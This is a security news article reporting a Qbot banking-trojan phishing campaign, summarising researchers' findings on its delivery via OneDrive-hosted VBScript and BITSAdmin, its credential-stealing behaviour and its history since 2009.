Latest Qbot Variant Evades Detection, Infects Thousands

qbot malware new variant cyberattack

Ever-changing Qbot trojan has been spotted in a fresh campaign with a new “context aware” delivery technique.

Qbot, an information-stealing trojan that has been around for 10 years, has resurfaced again with a new phishing-based infection technique that is able to evade anti-spam defenses.

Varonis Security Research spotted the fresh global Qbot campaign in March. Researchers said they have positively identified 2,726 victims, based on an analysis of one of the attacker’s servers. However, they suspect the actual number of victims is much higher. Researchers at JASK meanwhile on Tuesday released further analysis of the latest iteration of the Qbot malware.

Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as being able to self-replicate via shared drives and removable media. This time around, QBot has been spreading through a phishing campaign targeting U.S. corporations and also victims in Europe, Asia and South America.
The delivery mechanism for this variant of Qbot is via phishing campaigns, where victims receive an email containing a link to what appears to be an online document. The email purports to be an exiting email thread, under the guise of the replying to a pre-existing business-based correspondence, according to JASK.

“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview. He said that the goal of the attacks is to steal proprietary financial information, including bank-account credentials.

The infection technique is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a Microsoft Visual Basic Scripting Edition (VBScript) in a compressed ZIP archive. If the archive is opened, the attack spawns the legitimate BITSAdmin Windows utility. That triggers another native Windows utility, Wscript.exe, which is used to download the Qbot malware file “august.png” from the attacker’s server.

“This two-stage process is a common attack vector for actors, used to bypass security controls. Some security technologies will detonate links in an email, so including a link to a ZIP archive is likely to get through (as opposed to a link straight to the malware),” Longo wrote.

Varonis Security Research noted that previous Qbot attacks have utilized malicious Word document macros as a stage-one step in attacks. Varonis researchers also noted that this variant is unique in that the malware uses BITSAdmin to download the loader.  This appears to be a new behavior, as previous samples used PowerShell. According to a Microsoft description, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.”

Latest Qbot Variant Evades Anti-Spam Gateways

Click to enlarge.

Post-infection, according to Varonis, “the malware compromises a domain account, it enumerates the ‘Domain Users’ group and brute-forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.”

The goal of the malware is to siphon money from user accounts via stealing credentials. Techniques and tools used include keylogging to steal credentials/cookies, and the use of hooking. Hooking is where “the main payload injects … all the processes in the system with a code that hooks API calls and searches for financial/banking strings. The malware extracts the data, credentials or session cookies from the process and uploads it to the attacker,” Varonis wrote.

Since 2009, when Qbot launched its first assault on computer networks, the malware has never completely vanished. Since then, there have been ongoing but sporadic reports of Qbot infections and variants causing limited infections. In 2016, the criminals behind the trojan repurposed the original Qbot source code and tweaked it with the ability to regenerate itself on an infected host every 24 hours. The malware was also spotted in 2017 with a new tactic of locking users out of their Active Directory accounts, by tying up systems via cycling through user and domain credentials in a dictionary attack.

Don’t miss our free Threatpost webinar, “Data Security in the Cloud,” on April 24 at 2 p.m. ET.

 A panel of experts will join Threatpost senior editor Tara Seals to discuss how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.

Suggested articles